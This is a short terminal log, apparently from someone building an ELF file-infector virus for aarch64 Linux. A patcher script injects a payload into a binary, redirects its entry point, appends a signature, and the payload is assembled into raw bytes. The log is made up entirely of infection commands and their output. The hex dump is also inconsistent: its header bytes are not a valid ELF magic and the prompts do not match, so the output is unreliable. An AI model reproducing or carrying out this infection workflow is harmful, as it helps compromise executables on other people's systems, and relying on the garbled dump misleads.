ser@ubuntu:~/virus$ python3 elf_patcher.py thoriq payload.bin output_infected
[✔] Patching selesai:
    Entry point lama : 0x4000b0
    Entry point baru : 0x4000d8
    Payload offset    : 0xd8
    Signature offset  : 0x10186
    Signature VA      : 0x410186
    Output            : output_infected
user@ubuntu:~/virus$ xxd output_infected | head
00000000: 7f4c 454c 0201 0100 0000 0000 0000 0000  .LEL............
00000010: 0200 b700 0100 0000 d800 4000 0000 0000  ..........@.....
00000020: 4000 0000 0000 0000 c002 0000 0000 0000  @...............
00000030: 0000 0000 4000 3800 0200 4000 0600 0500  ....@.8...@.....
00000040: 0100 0000 0500 0000 0000 0000 0000 0000  ................
00000050: 8b01 0100 0000 0000 8b01 0100 0000 0000  ................
00000060: d800 0000 0000 0000 d800 0000 0000 0000  ................
00000070: 0000 0100 0000 0000 0100 0000 0600 0000  ................
00000080: d800 0000 0000 0000 d800 4100 0000 0000  ..........A.....
00000090: d800 4100 0000 0000 0800 0000 0000 0000  ..A.............
user@ubuntu:~/virus$ tail -c 5 output_infected
febriuser@ubuntu:~/virus$

aarch64-linux-gnu-as -o payload.o payload.s
aarch64-linux-gnu-ld -o payload payload.o
aarch64-linux-gnu-objcopy -O binary payload payload.bin
